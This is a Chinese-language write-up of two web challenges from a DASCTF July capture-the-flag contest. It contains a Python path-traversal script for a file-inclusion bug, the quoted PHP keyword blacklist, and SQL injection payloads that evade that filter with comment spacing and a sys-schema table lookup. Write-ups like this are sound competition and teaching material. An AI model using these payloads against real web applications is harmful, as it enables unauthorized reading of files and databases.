DASCTF 七月月赛 web部分wp

Ezfileinclude

图片是通过参数引入的,并且要带上时间戳;

文件名的检测机制为:不能以.//.开头

脚本:

1
2
3
4
5
6
7
8
9
10
import requests
import time

t = time.time()
t = str(t)
t = t.split('.')[0]
f = 'a/../../../../../../flag'.encode('base64')
url = 'http://183.129.189.60:10009/image.php?t={}&f={}'.format(t, f)
s = requests.get(url).text
print(s)

SQLi

return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

发现可以直接进行union注入,且存在回显:

http://183.129.189.60:10004/?id=0%27union/**/select/**/1,database(),3%23

查表名:

?id=100%27/**/union/**/SELECT/**/group_concat(table_name),2,3/**/FROM/**//**/sys.x$schema_flattened_keys/**/WHERE/**/table_schema='sqlidb'/**/GROUP/**/BY/**/table_name/**/limit/**/0,1%23

查数据(flag表只有两个字段,因此额外查询一个列1,来凑够三个列):

?id=100’/**/union/**/select/**/*,1/**/from/**/flllaaaggg%23

参考:https://www.gem-love.com/ctf/2514.html?tdsourcetag=s_pctim_aiomsg